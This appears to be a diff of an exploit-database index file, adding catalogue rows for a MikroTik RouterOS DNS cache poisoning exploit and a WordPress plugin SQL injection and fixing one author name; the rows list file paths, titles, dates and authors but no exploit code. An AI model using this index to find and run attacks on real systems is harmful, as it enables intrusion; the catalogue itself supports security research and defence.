 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17744,6 +17745,7 @@ id,file,description,date,author,type,platform,port
 47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,
 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
+47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41610,7 +41612,7 @@ id,file,description,date,author,type,platform,port
 46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
 46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
 46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
-46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel_ Schneider_ Wulf",webapps,php,
+46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel",webapps,php,
 46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,
 46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80
 46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php,
@@ -41883,3 +41885,4 @@ id,file,description,date,author,type,platform,port
 47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json,
 47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
 47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,
+47567,exploits/php/webapps/47567.txt,"Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,